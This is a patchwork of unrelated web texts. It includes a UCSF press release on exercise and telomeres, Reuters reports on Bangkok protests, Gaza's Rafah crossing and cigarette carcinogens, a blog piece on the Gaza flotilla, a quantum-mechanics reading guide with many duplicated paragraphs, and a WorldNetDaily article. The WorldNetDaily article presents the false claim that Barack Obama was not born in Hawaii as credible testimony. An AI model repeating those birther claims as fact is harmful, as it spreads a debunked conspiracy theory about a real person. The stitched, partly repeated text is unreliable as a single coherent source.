How is the government conducting the oil clean up in the Gulf ?
Why do you think as you do ?
Demonstrate your detailed knowledge of the process in defense of your position .
We frequently decry the abject ignorance exhibited by " the man on the street " interviews , and the small minded hysteria voiced by random folks pulled aside to give their opinion .
But what are we doing to actually further intelligent analysis ?
How are we being shaped by the landslide of " Public Opinion " delivered as a " Yes " or " No " via Twitter , or a Facebook page that begs for affirmation ?
There is a 2000 year old trick that would go further to clarify , and extend , the rash of opinions with which we are daily deluged .
It would also provide tremendous assistance to those who really have no opinions on complex issues because they instinctively understand that they may not have all of the information they need , and random opinions provide nothing but a cover for not learning about , and understanding the issue .
" Why ? "
It used to drive my students crazy ... until they began to appreciate the logical traps , misinformation , and misguided passions they were cloaking in the guise of " opinion " .
Exercise can buffer the effects of stress - induced cell aging , according to new research from UCSF that revealed actual benefits of physical activity at the cellular level .
The scientists learned that vigorous physical activity as brief as 42 minutes over a 3 - day period , similar to federally recommended levels , can protect individuals from the effects of stress by reducing its impact on telomere length .
Telomeres ( pronounced TEEL - oh - meres ) are tiny pieces of DNA that promote genetic stability and act as protective sheaths by keeping chromosomes from unraveling , much like plastic tips at the ends of shoelaces .
A growing body of research suggests that short telomeres are linked to a range of health problems , including coronary heart disease and diabetes , as well as early death .
" Telomere length is increasingly considered a biological marker of the accumulated wear and tear of living , integrating genetic influences , lifestyle behaviors , and stress , '' said Elissa Epel , PhD , who is one of the lead investigators and an associate professor in the UCSF Department of Psychiatry .
" Even a moderate amount of vigorous exercise appears to provide a critical amount of protection for the telomeres . "
The findings build on previous UCSF research documenting that chronic psychological stress takes a significant toll on the human body by impacting the length of telomeres in immune cells .
While the exact mechanisms have remained elusive , a UCSF - led research study in 2004 ( PNAS , Dec. 7 , 2004 ; 101 ( 49 ) found that the ramifications of stress stretch deep into our cells , affecting telomeres , which are believed to play a key role in cellular aging , and possibly disease development .
The findings also build on previous studies showing that exercise is linked to longer telomeres , but this is the first study to show that exercise -- acting as a " stress - buffer ' ' - can prevent the shortening of telomeres due to stress .
Research on telomeres , and the enzyme that makes them , was pioneered by three Americans , including UCSF molecular biologist Elizabeth Blackburn , PhD , who co-discovered the telomerase enzyme in 1985 .
The scientists received the Nobel Prize in Physiology or Medicine in 2009 .
" We are at the tip of the iceberg in our understanding of which lifestyle factors affect telomere maintenance , and how , '' noted Blackburn .
The new study , in which Blackburn is a co-author , is scheduled for publication May 26 , 2010 in the peer - reviewed online publication PLoS ONE .
In the study , 62 post - menopausal women - many of whom were caring for spouses or parents with dementia -- reported at the end of each day over three days the number of minutes of vigorous physical activity in which they had engaged .
Vigorous activity in the study was defined as " increased heart rate and / or sweating . ''
They also reported separately their perceptions of life stress that they had experienced during the prior month .
Their blood 's immune cells were examined for telomere length .
Results support the UCSF - led discovery six years earlier in premenopausal women that psychological stress has a detrimental effect on immune cell longevity , as it relates to shorter telomeres .
The new study showed , however , that when participants were divided into groups - an inactive group , and an active group ( i.e. , they met federal recommendations for 75 minutes of weekly physical activity ) - only the inactive high stress group had shorter telomeres .
The active high stress group did not have shorter telomeres .
In other words , stress predicted shorter telomeres in the sedentary group , but not in the active group .
The Centers for Disease Control and Prevention ( CDC ) suggests 75 minutes of vigorous activity a week for adults , or 150 minutes of moderate activity in addition to weight - bearing exercises .
For children and adolescents , recommended levels are 90 minutes per day .
For this sample of older women , it appears that the CDC - recommended level of vigorous exercise for adults may be enough to buffer the effects of stress on telomeres .
However , the researchers say , this finding needs to be replicated with larger samples .
" At this point , we have replicated previous findings showing a link between life stress and the dynamics of how cells age , '' said lead author Eli Puterman , PhD , a psychologist in the UCSF Department of Psychiatry .
" Yet we have extended those findings to show that , in fact , there are things we can do about it .
If we maintain the levels of physical activity recommended , at least those put forth by the CDC , we can prevent the unyielding damage that psychological stress may have on our body . ''
" Our findings also reveal that those who reported more stress were less likely to exercise over the course of the study , '' he said .
" While this finding may be discouraging , it offers a great opportunity to direct research to specifically examine these vulnerable stressed individuals to find ways to engage them in greater physical activity . ''
UCSF co-authors of the study reported in PLoS ONE include Jue Lin , PhD , a postdoctoral fellow in the Department of Biochemistry and Biophysics ; Aoife O'Donovan , PhD , a postdoctoral scholar in the Department of Psychiatry ; and Nancy Adler , PhD , a professor and vice chair in the Department of Psychiatry .
The research was supported by the National Institute of Aging , the Bernard and Barbro Fund , the UCSF - GIVI Center for AIDS Research , and a NIH / NCRR UCSF - CTSI grant .
The contents of the published paper are solely the responsibility of the authors and do not necessarily represent the official views of any of the granting agencies .
Drs. Blackburn , Epel , and Lin are co-founders of a company to measure telomere maintenance .
The UCSF researchers are now embarking on another research project in which participants will learn their own telomere length .
The scientists will test whether discovering one 's personal telomere length will motivate people to make lifestyle changes such as exercising more , reducing stress and eating less processed red meat , all factors that have been linked to telomere length .
Explore further Childhood adversity may promote cellular aging
Provided by University of California - San Francisco
BANGKOK ( Reuters ) -
Thai troops and armored vehicles massed in Bangkok ’s main business district on Wednesday and fired warning shots into the air ahead of a possible operation to evict anti-government protesters from their fortified encampment .
Troops called on protesters and civilians to leave their fortified encampment in central Bangkok and surrounding areas immediately .
“ Please leave the site immediately .
Officials are about to conduct an operation , ” the military said on a loudspeaker , according to a Channel 9 television reporter .
The military buildup comes a day after the collapse of a proposal for talks aimed at ending five days of chaotic street fighting that descended into urban warfare in which 39 people were killed and nearly 300 wounded
Soldiers sprayed a water cannon at a wall of tires at the entrance to the protest encampment after protesters doused them with fuel to prevent them from being ignited .
A leader of the red- shirted protesters called on supporters to hold their ground , saying he feared an imminent offensive on the protest site occupied by thousands in the heart of Bangkok ’s commercial district for more than six weeks .
It was unclear whether the military presence was the start of the crackdown or the beginning of a long process to raise pressure on the protesters and flush out women , children and others from a sprawling encampment where explosives , guns and grenades are thought to be stashed .
ARMOURED VEHICLES
At least two dozen armored personnel carriers approached the encampment .
Slideshow ( 34 images )
“ We ’re asking everybody to be ready for a crackdown because armored personnel carriers are beginning to move in ( to the area ) , ” said Nattawut Saikua , a protest leader .
Some troops in the business district were as close as 200 meters ( 650 ft ) from the protesters ’ three - meter ( 10 - foot ) high barricade made of tires , bamboo poles , and concrete topped with razor wire , a Reuters photographer said .
Pick - up trucks and buses carrying soldiers also arrived in the area .
Slideshow ( 34 images )
About 3,000 of the mostly rural and urban poor protestors , who broadly supporters of former premier Thaksin Shinawatra who was ousted in a 2006 coup , remain in the encampment in Bangkok ’s high - end shopping , hotel and diplomatic district .
“ We have received reports that they will come in some areas .
Negotiations are ongoing .
But if they come , we will let it happen and fight on from here , ” Nattawut told supporters from a stage at the center of the main protest site .
Soon after he spoke , protest leaders broke into songs and , in a surreal sight , ran comedy skits from the stage .
They accuse the British - born , Oxford - educated Prime Minister Abhisit Vejjajiva of lacking a popular mandate after coming to power in a controversial parliamentary vote in 2008 with tacit backing from the military , and have demanded immediate elections .
Troops have thrown a cordon around the 3 sq-km ( 1.2 sq- mile ) protest site , a “ tent city ” at the Rachaprasong intersection , paralyzing the heart of Bangkok .
Hundreds of women and children have taken refuge in a temple inside the protest area .
Deputy Prime Minister Suthep Thuagsuban has said moving in on the encampment had to be “ a last resort . ”
The red shirts have been stockpiling food , water , and supplies in their encampment since Thursday when troops began an operation to isolate them , sparking several days of street fighting that has killed 39 people and wounded nearly 300 in Thailand ’s deadliest political violence in 18 years .
Sign up to receive an email alert whenever a new post is added .
Enter your email address :
Delivered by FeedBurner
NEW FOR 2020 .
‘ SKETCHES FROM HILLS PLACE ’
T-SHIRTS , HOODIES , SWEATS .
( with free ‘ Sketches From Hills Place ’ album download ) .
All available on the shop page or Band Camp .
In direct contradiction of the White House storyline , the former Honolulu elections official who caused a national stir this month when he told WND Barack Obama was " definitely " not born in Hawaii and no long - form , hospital - generated birth certificate even exists for the president in the Aloha State is now reaffirming those claims to a network television affiliate .
Tim Adams , the former senior elections clerk for the city and county of Honolulu , was interviewed by Gene Birk of ABC affiliate WBKO - TV in Bowling Green , Ky .
Video of the 9 - minute interview has been posted on YouTube and is embedded here :
" As of the time I was in Hawaii working in the elections office , " said Adams , " we had many people who were asking about the eligibility of Senator Obama to be president .
I was told at the time there is no long - form birth record , which would have been the case if President Obama was born in [ a ] hospital in Honolulu .
There is no such form in Hawaii . "
TRENDING : The Bidens avoided paying more than $ 500,000 in payroll taxes by exploiting S corporations
The
hottest book in America is the one that exposes the real Obama !
Get your autographed copy only from WND !
As WND first reported June 10 , Honolulu 's current elections administrator , Glen Takahashi , confirmed that Tim Adams was indeed " senior elections clerk " in 2008 , in charge of verifying voters ' identity , especially those involving absentee ballots .
Adams , 45 , also noted he 's willing to testify about his claims in a court of law .
He continued in his TV interview : " [ Obama ] does have a [ Certification ] of Live Birth , which is given to children of families who are residents of Hawaii when children are born outside the state .
So , I assert that he was born outside of Hawaii .
Now , we can't tell you where he was born .
Some of his family members said that he had been born while his mother was on a trip overseas .
This short - form Certification of Live Birth image , which is not the same as a long - form , hospital - generated Certificate of Live Birth , was released by the Obama campaign June 2008 .
" When I mentioned this , it got people 's attention .
They also did not like my conclusions that since President Obama does have a [ Certification ] of Live Birth from the state of Hawaii , that he was born a U.S. citizen .
And during the initial part of the campaign , when questions about his eligibility to be president came up – including Senator McCain because he was born in Panama – that both these men were vetted by the same process as any other presidential candidate .
So , while we may not agree , some people say that because of Article 2 of the Constitution , President Obama was not eligible to be president .
That 's not a question that we can answer .
" The people who are in charge of saying who is eligible to run for president have already vouched that he was indeed an eligible candidate .
If we disagree with that , we do n't need to go after the man .
We need to look at the process by which candidates are vetted for public office . "
The interviewer , apparently looking to reaffirm what he was just told , asked Adams again , " So let me understand what you 're saying .
There is no long - form birth certificate , because he was not born on U.S. soil . "
" Correct , " responded Adams .
RELATED : THE BIG LIST of eligibility ' proofers '
" But there is a Certification of Birth , which is what this is , " said Birk , as he looked at a photocopy of Obama 's purported short - form , computer - generated Certification of Live Birth , a document which does not specify the hospital where Obama might have been born nor any doctor 's name or signature .
" A facsimile of it has been put online , " said Adams .
Birk responded , " Yes , and , in your opinion , this means regardless of where he was born , he was a U.S. citizen at birth . "
" Yes , " said Adams , reiterating his personal opinion that Obama is eligible to hold office and that the question would have been answered when the Democratic National Committee vetted him to run for public office prior to the 2008 election .
Adams ' claims are starkly different from those of the White House .
" The noble truth is that the president was born in Hawaii , a state of the United
States of America , " Press Secretary Robert Gibbs told WND .
Linda Lingle , the Republican governor of Hawaii , has also publicly voiced the alleged exact location of
Obama 's birth , saying " the president was , in fact , born at Kapi'olani Hospital
in Honolulu , Hawaii . "
Since WND 's original report , Adams has come under fire from some critics online who suggested that Adams may hold an antiblack philosophy and that his assertions were possibly racially motivated .
Adams , though , said it 's people still asking Obama to prove his eligibility who tend to have race - based sentiments against the commander in chief .
Tim Adams , the former senior elections clerk for Honolulu , says President Obama was " definitely " not born in Hawaii , and a long - form , hospital - generated birth certificate for Obama does not exist in the state .
" Some people are basically racist , " Adams said .
" It 's a question of race .
They do n't like having someone who 's not white , or they do n't like someone who 's from such a different heritage as President Obama , because his family has ties to Africa .
His family also has ties to middle America , so to me it 's also a nonissue .
The other thing is , is he is a liberal , he 's a Democrat .
There 's a lot of political rancor in the country in the last decade , starting with President Bush , and then we had 9/11 .
We 've had the wars overseas .
And this entire fight between the Left and the Right has become so balkanized that anything someone finds , they say , ' Oh look , he lied about being born inside the United States .
There must be something terrible there !'
But they 're extrapolating something that 's not true . "
Adams also lamented the poor state of civil discourse in America .
" I think we 're getting to the point where no one can talk to anyone else , " he explained .
" The rhetoric has become so divisive , that there is no way for us to work out these issues that our country 's facing .
So I kind of dove in and tried to start a conversation and have paid for it dearly . "
When asked what he had learned from this experience , Adams said , " It 's very difficult for anyone to speak publicly on a controversial issue in the country , even if they do so with the best intentions . "
Adams , a Hillary Clinton supporter who now teaches English at Western
Kentucky University while he works on his master 's degree , burst onto
the national scene in a WND story
in which he asserted that Obama was not born in Hawaii as the
White House claims and that a long - form , hospital - generated birth
certificate for Obama does not exist there .
" There is no birth certificate , " he said .
" It 's like an open secret .
There is n't one .
Everyone in the government there knows this . "
Copy of original long - form birth certificate of Susan Nordyke , born in Honolulu the day after Obama 's reported birthdate .
President Obama has never produced any document like this .
" I had direct access to the Social Security database , the national crime
computer , state driver 's license information , international passport
information , basically just about anything you can imagine to get someone's
identity , " Adams explained .
" I could look up what bank your home mortgage was
in .
I was informed by my boss that we did not have a birth record [ for Obama ] . "
At the time , there were conflicting reports that Obama had been born at the
Queen 's Medical Center in Honolulu , as well as the Kapi'olani Medical Center for Women & Children , also located in the capital city .
So Adams says his office checked with both
facilities .
" They told us , ' We do n't have a birth certificate for him , ' " he said .
" They
told my supervisor , either by phone or by e-mail , neither one has a document
that a doctor signed off on saying they were present at this man 's birth . "
To date , no Hawaiian hospital has provided documented confirmation Obama
was born at its facility .
Adams , 45 , stressed , " In my professional opinion , he definitely was not born
in Hawaii .
I can say without a shadow of a doubt that he was not born
in Hawaii because there is no legal record of him being born there .
If
someone called and asked about it , I could not tell them that person
was born in the state . "
He now expects his former co-workers still working in the elections office to say little , if anything , about the nonexistent birth certificate because they fear for their jobs .
" If you 're working in the civil service and you say this , you 're done , " Adams said .
" Do n't expect to have a good career , especially since the governor is on the other side .
Embarassing them is not good for your career . "
WND 's original report about Adams ' claims has already been made into a YouTube video , getting more than 275,000 hits :
To date , President Obama has still not provided simple , incontrovertible proof of his
exact birthplace .
That information would be included on his long - form ,
hospital - generated birth certificate , which Obama has steadfastly refused to
release amid a flurry of conflicting reports .
The White House has only proffered on the Internet a " Certification of Live Birth " to assert he was born
in Hawaii , but that document was available to children not born in Hawaii at the time of Obama 's birth .
Many people remain unaware a child could be born somewhere else and still receive a Hawaii Certification of Live Birth .
State
law specifically allows " an adult or the legal parents of a minor child " to
apply to the health department and , upon unspecified proof , be given the birth
document .
" Anyone can get that [ Certification of Live Birth ] , " said Adams .
" They are normally given if you give
birth at home or while traveling overseas .
We have a lot of Asian population [ in
Hawaii ] .
It 's quite common for people to come back and get that . "
As WND reported last July , the Kapi'olani Medical Center trumpeted – then later concealed – a letter allegedly written by President Obama in which he ostensibly declares his birth at the facility .
A photograph taken by the Kapi'olani Medical Center for WND shows a letter allegedly written by President Obama on embossed White House stationery in which he declares the Honolulu hospital to be " the place of my birth . "
The hospital , after publicizing the letter then refusing to confirm it even existed , is now vouching for its authenticity , but not its content .
The White House has yet to verify any aspect of the letter .
" As a beneficiary of the excellence of the Kapi'olani Medical Center – the place of my birth – I am pleased to add my voice to your chorus of supporters , " Obama purportedly wrote .
This excerpt from the alleged Obama letter is perhaps the first formal declaration from the president about his exact birthplace .
The White House has still not confirmed if the letter or its contents are authentic .
But the authenticity of that letter remains in doubt .
Since WND raised
questions about the veracity of the letter itself and its content , the
White House has refused to say if the message is real and if its text originated with the president .
Besides his actual birth documentation , documentation that remains concealed for Obama includes kindergarten records , Punahou school records , Occidental College records , Columbia University records , Columbia thesis , Harvard Law School records , Harvard Law Review articles , scholarly articles from the University of Chicago , passport , medical records , his files from his years as an Illinois state senator , his Illinois State Bar Association records , any baptism records , and his adoption records .
If you 'd like to sound off on this issue , please take part in the WorldNetDaily poll .
Israel has released a video of the early - morning raid on a blockade - violating aid ship headed for Gaza that resulted in the shooting deaths of nine activists .
It appears to show soldiers being beaten with metal pipes and thrown overboard .
On Monday morning , the Israeli Defense Force conducted a raid on a flotilla of ships violating an Israeli blockade by bringing humanitarian aid to Gaza .
During operations on one ship , the Mavi Marmara , at least nine of the activists were killed , and several more injured .
Many of the injured , members of a group called the Free Gaza Movement , were Turkish citizens , and in response , Turkey has recalled its ambassador and cancelled planned joint military exercises .
Several countries have condemned Israel for the attacks , and an emergency meeting of the U.N. Security Council has been called .
In an attempt to make the case that their soldiers ' actions were justified , Israel has distributed a video of the opening moments of the raid , taken from an Israeli ship .
The video seems to show some activists hitting the commandos with metal pipes , and , at one point , throwing one soldier overboard .
Does it vindicate Israel ?
Well , you know , it depends on where you stand on the question of " necessary force " and what you think of the idea of " proportional response . "
But do n't worry !
I 'm sure someone on the internet , or maybe in your office , has an opinion about exactly who was at fault .
Meanwhile , 28 people in Gaza have died over the last year waiting for approval to seek medical treatment in Israel , directly thanks to Israel 's blockade .
GAZA ( Reuters ) - Egypt will open its border with the Gaza Strip to let Palestinians cross , officials said on Tuesday , following a storm of international criticism of Israel ’s bloody enforcement at sea of its blockade on the enclave .
A Hamas policeman looks at the passports of Palestinians waiting to cross into Egypt at the Rafah border crossing in the southern Gaza Strip June 1 , 2010 .
REUTERS / Mohammed Salem
The decision , urged by the Palestinian Islamist movement Hamas against whom the embargo has been directed , prompted dozens of people to race to the crossing point in the southern Gaza Strip town of Rafah , although the gates remained closed .
Officials in Egypt and Gaza said the crossing would open on Wednesday until further notice -- a step seen as an attempt by Cairo to deflect criticism of its role in imposing the blockade .
Rafah is the only point on Gaza ’s borders not controlled by Israel .
Cairo , coordinating with Israel , has opened it only sparingly since Hamas seized control of Gaza three years ago .
A permanent opening of the crossing , which runs across a stretch of desert frontier riddled by hundreds of smuggling tunnels , would be a major boost for Hamas and a blow to efforts by Israel and its Western allies to cripple the Islamists .
However , a full , permanent opening is seen as unlikely .
Cairo fears such a move would allow Israel to wash its hands of any responsibility for the territory , which the Jewish state captured from Egypt in the 1967 Middle East war and which the Palestinians want to become part of their future state .
Slideshow ( 7 images )
Cairo , which made peace with Israel in 1979 , also has strained relations with Hamas , an offshoot of the Muslim Brotherhood movement , Egypt ’s biggest opposition group .
“ UNLIMITED TIME ”
The Interior Ministry run by Hamas since it seized control of Gaza from Palestinian President Mahmoud Abbas in June 2007 said in a statement : “ Rafah crossing is open every day from 9 a.m. ( 0600 GMT ) to 7 p.m . ”
An Egyptian security source told Reuters : “ Egypt opened its border with the Gaza Strip on Tuesday to allow humanitarian and medical aid to enter the Strip .
“ The border will remain open for an unlimited time , ” the source said , letting Palestinians enter and leave Egypt .
Aid convoys , to which Egypt has in the past given limited access , would be able to use the crossing , subject to following Cairo ’s limitation that only food and medical supplies go in .
“ Hard materials ” -- apparently including concrete and steel which Gazans want to repair damage from an Israeli offensive last year -- would have to go via Israel , the Egyptian source said .
Israel has made clear since it halted a Turkish - backed , Gaza - bound aid convoy at sea on Monday that it will not ease its embargo .
The deaths of nine activists when commandos stormed a Turkish ship in international waters have unleashed a widespread furor over Israel ’s move .
United Nations officials have demanded an end to the blockade , which has impoverished the 1.5 million people of the Gaza Strip .
Israel ’s main ally the United States has been more cautious in its response to the incident .
After Israel withdrew troops and settlers from Gaza in 2005 , the European Union placed monitors at the Rafah crossing to reassure Israel that weapons would not reach Gaza from Egypt .
That system of surveillance collapsed , and the blockade was tightened , when Hamas seized full control of Gaza in 2007 .
Earlier on Tuesday , Hamas ’s Syrian - based leader Khaled Meshaal said : “ We call on our brothers in Egypt to use this historic moment to open Rafah crossing .
Egypt is able to do this and that would indeed be a real response to Israel ’s actions . ”
WASHINGTON ( Reuters ) - Americans inhale more cancer - causing agents with their cigarettes , probably because of the tobacco blend , while smokers in Canada , Britain and Australia get less , U.S. researchers reported on Tuesday .
Women smoke in central Sydney May 11 , 2009 .
REUTERS / Daniel Munoz
Their unique study also demonstrated that the amounts of these carcinogens in a smoker ’s cigarette butts directly correlated with tell - tale compounds in the smoker ’s urine .
The study , published in the June issue of Cancer Epidemiology , Biomarkers and Prevention , can help researchers trying to trace the harmful effects of smoking .
“ We know that cigarettes from around the world vary in their ingredients and the way they are produced , ” said Dr. Jim Pirkle of the U.S. Centers for Disease Control and Prevention , who heads a lab using a mass spectrometer to measure levels of chemicals in people ’s bodies .
“ All of these cigarettes contain harmful levels of carcinogens , but these findings show that amounts of tobacco - specific nitrosamines differ from country to country , and U.S. brands are the highest in the study , ” Pirkle said in a statement .
CDC ’s David Ashley and colleagues did in - depth tests using 126 smokers in the United States , Canada , Britain and Australia .
“ Seventeen eligible cigarette brands ( between 3 and 5 brands from each country ) were selected on the basis of national sales and nicotine yield to identify popular brands with a range of ventilation , ” the researchers wrote .
Ventilation is how much air is mixed in with the smoke from the cigarette as it is inhaled .
The volunteers had their saliva and urine tested and also turned over their used cigarette butts to the researchers .
FIVE MILLION DIE A YEAR
These were all tested for nicotine and for the chemicals 4 -( methylnitrosamino ) - 1-( 3 - pyridyl ) - 1 - butanone ( NNK for short ) and the breakdown product of NNK in the body , called NNAL .
These cancer - causing agents are known as tobacco - specific nitrosamines or TSNAs .
“ We have shown a direct association between the 24 - hour mouth - level exposure of NNK resulting from cigarette smoking and the concentration of its primary metabolite , NNAL , in the urine of smokers , ” the researchers wrote .
“ Internal dose concentrations of urinary NNAL are significantly lower in smokers in countries that have lower TSNA levels in cigarettes such as Canada and Australia in contrast to countries that have high levels of these carcinogens in cigarettes , such as the United States . ”
The popular U.S. cigarette brands studied contained “ American blend ” tobacco , known to contain higher TSNA levels than the “ bright ” tobacco used in the most popular Australian , Canadian , and British brands .
Australian and Canadian smokers got more nicotine than U.S. and British smokers , but not of TSNAs .
The World Health Organizations says 5 million people die every year from tobacco - related heart attacks , strokes and cancers .
Another 430,000 adults die annually from breathing second - hand smoke .
Some of the brands tested included :
* Marlboro , sold by Philip Morris International and Altria Group Inc ’s Philip Morris USA unit .
* Winfield , manufactured under license by British American Tobacco Australia .
* Silk Cut and Benson & Hedges , produced by Japan Tobacco Inc .
* Players , made by Canada ’s largest manufacturer , Imperial Tobacco , a division of Imasco Ltd .
* Camels , made by Reynolds American .
* Newports , made by Lorillard Inc .
This is an inclusive guide to the series of posts on quantum mechanics that began on April 9th , 2008 , including the digressions into related topics ( such as the difference between Science and Bayesianism ) and some of the preliminary reading .
You may also be interested in one of the less inclusive post guides , such as :
My current plan calls for the quantum physics series to eventually be turned into one or more e-books .
Preliminaries :
Probability is in the Mind :
If you are uncertain about a phenomenon , this is a fact about your state of mind , not a fact about the phenomenon itself .
There are mysterious questions but not mysterious answers .
The map is not the territory .
Reductionism :
We build models of the universe that have many different levels of description .
But so far as anyone has been able to determine , the universe itself has only the single level of fundamental physics - reality does n't explicitly compute protons , only quarks .
: We build models of the universe that have many different levels of description .
But so far as anyone has been able to determine , the universe itself has only the single level of fundamental physics - reality does n't explicitly compute protons , only quarks .
Joy in the Merely Real :
If you can't take joy in things that turn out to be explicable , you 're going to set yourself up for eternal disappointment .
Do n't worry if quantum physics turns out to be normal .
Zombies !
Zombies ? and The Generalized Anti-Zombie Principle :
Do n't try to put your consciousness or your personal identity outside physics .
Whatever makes you say " I think therefore I am " , causes your lips to move ; it is within the chains of cause and effect that produce our observed universe .
: Do n't try to put your consciousness or your personal identity outside physics .
Whatever makes you say " I think therefore I am " , causes your lips to move ; it is within the chains of cause and effect that produce our observed universe .
Belief in the Implied Invisible :
If a spaceship goes over the cosmological horizon relative to us , so that it can no longer communicate with us , should we believe that the spaceship instantly ceases to exist ?
Basic Quantum Mechanics :
Quantum Explanations : Quantum mechanics does n't deserve its fearsome reputation .
If you tell people something is supposed to be mysterious , they wo n't understand it .
It 's human intuitions that are " strange " or " weird " ; physics itself is perfectly normal .
Talking about historical erroneous concepts like " particles " or " waves " is just asking to confuse people ; present the real , unified quantum physics straight out .
The series will take a strictly realist perspective - quantum equations describe something that is real and out there .
Warning : Although a large faction of physicists agrees with this , it is not universally accepted .
Stronger warning : I am not even going to present non-realist viewpoints until later , because I think this is a major source of confusion .
: Quantum mechanics does n't deserve its fearsome reputation .
If you tell people something is supposed to be mysterious , they wo n't understand it .
It 's human intuitions that are " strange " or " weird " ; physics itself is perfectly normal .
Talking about historical erroneous concepts like " particles " or " waves " is just asking to confuse people ; present the real , unified quantum physics straight out .
The series will take a strictly realist perspective - quantum equations describe something that is real and out there .
Warning : Although a large faction of physicists agrees with this , it is not universally accepted .
Stronger warning : I am not even going to present non-realist viewpoints until later , because I think this is a major source of confusion .
Configurations and Amplitude : A preliminary glimpse at the stuff reality is made of .
The classic split - photon experiment with half - silvered mirrors .
Alternative pathways the photon can take , can cancel each other out .
The mysterious measuring tool that tells us the relative squared moduli .
: A preliminary glimpse at the stuff reality is made of .
The classic split - photon experiment with half - silvered mirrors .
Alternative pathways the photon can take , can cancel each other out .
The mysterious measuring tool that tells us the relative squared moduli .
Joint Configurations :
The laws of physics are inherently over mathematical entities , configurations , that involve multiple particles .
A basic , ontologically existent entity , according to our current understanding of quantum mechanics , does not look like a photon - it looks like a configuration of the universe with " A photon here , a photon there . "
Amplitude flows between these configurations can cancel or add ; this gives us a way to detect which configurations are distinct .
It is an experimentally testable fact that " Photon 1 here , photon 2 there " is the same configuration as " Photon 2 here , photon 1 there " .
: The laws of physics are inherently over mathematical entities , configurations , that involve multiple particles .
A basic , ontologically existent entity , according to our current understanding of quantum mechanics , does not look like a photon - it looks like a configuration of the universe with " A photon here , a photon there . "
Amplitude flows between these configurations can cancel or add ; this gives us a way to detect which configurations are distinct .
It is an experimentally testable fact that " Photon 1 here , photon 2 there " is the same configuration as " Photon 2 here , photon 1 there " .
Distinct Configurations :
Since configurations are over the combined state of all the elements in a system , adding a sensor that detects whether a particle went one way or the other , becomes a new element of the system that can make configurations " distinct " instead of " identical " .
This confused the living daylights out of early quantum experimenters , because it meant that things behaved differently when they tried to " measure " them .
But it 's not only measuring instruments that do the trick - any sensitive physical element will do - and the distinctness of configurations is a physical fact , not a fact about our knowledge .
There is no need to suppose that the universe cares what we think .
: Since configurations are over the combined state of all the elements in a system , adding a sensor that detects whether a particle went one way or the other , becomes a new element of the system that can make configurations " distinct " instead of " identical " .
This confused the living daylights out of early quantum experimenters , because it meant that things behaved differently when they tried to " measure " them .
But it 's not only measuring instruments that do the trick - any sensitive physical element will do - and the distinctness of configurations is a physical fact , not a fact about our knowledge .
There is no need to suppose that the universe cares what we think .
Where Philosophy Meets Science :
In retrospect , supposing that quantum physics had anything to do with consciousness was a big mistake .
Could philosophers have told the physicists so ?
But we do n't usually see philosophers sponsoring major advances in physics ; why not ?
Can You Prove Two Particles Are Identical ? :
You would n't think that it would be possible to do an experiment that told you that two particles are completely identical - not just to the limit of experimental precision , but perfectly .
You could even give a precise - sounding philosophical argument for why it was not possible - but the argument would have a deeply buried assumption .
Quantum physics violates this deep assumption , making the experiment easy .
: You would n't think that it would be possible to do an experiment that told you that two particles are completely identical - not just to the limit of experimental precision , but perfectly .
You could even give a precise - sounding philosophical argument for why it was not possible - but the argument would have a deeply buried assumption .
Quantum physics violates this deep assumption , making the experiment easy .
Classical Configuration Spaces :
How to visualize the state of a system of two 1 - dimensional particles , as a single point in 2 - dimensional space .
A preliminary step before moving into ...
: How to visualize the state of a system of two 1 - dimensional particles , as a single point in 2 - dimensional space .
A preliminary step before moving into ...
The Quantum Arena : Instead of a system state being associated with a single point in a classical configuration space , the instantaneous real state of a quantum system is a complex amplitude distribution over a quantum configuration space .
What creates the illusion of " individual particles " , like an electron caught in a trap , is a plaid distribution - one that happens to factor into the product of two parts .
It is the whole distribution that evolves when a quantum system evolves .
Individual configurations do n't have physics ; amplitude distributions have physics .
Quantum entanglement is the general case ; quantum independence is the special case .
: Instead of a system state being associated with a single point in a classical configuration space , the instantaneous real state of a quantum system is a complex amplitude distribution over a quantum configuration space .
What creates the illusion of " individual particles " , like an electron caught in a trap , is a plaid distribution - one that happens to factor into the product of two parts .
It is the whole distribution that evolves when a quantum system evolves .
Individual configurations do n't have physics ; amplitude distributions have physics .
Quantum entanglement is the general case ; quantum independence is the special case .
Feynman Paths :
Instead of thinking that a photon takes a single straight path through space , we can regard it as taking all possible paths through space , and adding the amplitudes for every possible path .
Nearly all the paths cancel out - unless we do clever quantum things , so that some paths add instead of canceling out .
Then we can make light do funny tricks for us , like reflecting off a mirror in such a way that the angle of incidence does n't equal the angle of reflection .
But ordinarily , nearly all the paths except an extremely narrow band , cancel out - this is one of the keys to recovering the hallucination of classical physics .
: Instead of thinking that a photon takes a single straight path through space , we can regard it as taking all possible paths through space , and adding the amplitudes for every possible path .
Nearly all the paths cancel out - unless we do clever quantum things , so that some paths add instead of canceling out .
Then we can make light do funny tricks for us , like reflecting off a mirror in such a way that the angle of incidence does n't equal the angle of reflection .
But ordinarily , nearly all the paths except an extremely narrow band , cancel out - this is one of the keys to recovering the hallucination of classical physics .
No Individual Particles :
One of the chief ways to confuse yourself while thinking about quantum mechanics , is to think as if photons were little billiard balls bouncing around .
The appearance of little billiard balls is a special case of a deeper level on which there are only multiparticle configurations and amplitude flows .
It is easy to set up physical situations in which there exists no fact of the matter as to which electron was originally which .
: One of the chief ways to confuse yourself while thinking about quantum mechanics , is to think as if photons were little billiard balls bouncing around .
The appearance of little billiard balls is a special case of a deeper level on which there are only multiparticle configurations and amplitude flows .
It is easy to set up physical situations in which there exists no fact of the matter as to which electron was originally which .
Identity Is n't In Specific Atoms , Three Dialogues on Identity : Given that there 's no such thing as " the same atom " , whether you are " the same person " from one time to another can't possibly depend on whether you 're made out of the same atoms .
Decoherence : A quantum system that factorizes can evolve into a system that does n't factorize , destroying the illusion of independence .
But entangling a quantum system with its environment , can appear to destroy entanglements that are already present .
Entanglement with the environment can separate out the pieces of an amplitude distribution , preventing them from interacting with each other .
Decoherence is fundamentally symmetric in time , but appears asymmetric because of the second law of thermodynamics .
: A quantum system that factorizes can evolve into a system that does n't factorize , destroying the illusion of independence .
But entangling a quantum system with its environment , can appear to destroy entanglements that are already present .
Entanglement with the environment can separate out the pieces of an amplitude distribution , preventing them from interacting with each other .
Decoherence is fundamentally symmetric in time , but appears asymmetric because of the second law of thermodynamics .
The So - Called Heisenberg Uncertainty Principle : Unlike classical physics , in quantum physics it is not possible to separate out a particle 's " position " from its " momentum " .
The evolution of the amplitude distribution over time , involves things like taking the second derivative in space and multiplying by i to get the first derivative in time .
The end result of this time evolution rule is that blobs of particle - presence appear to race around in physical space .
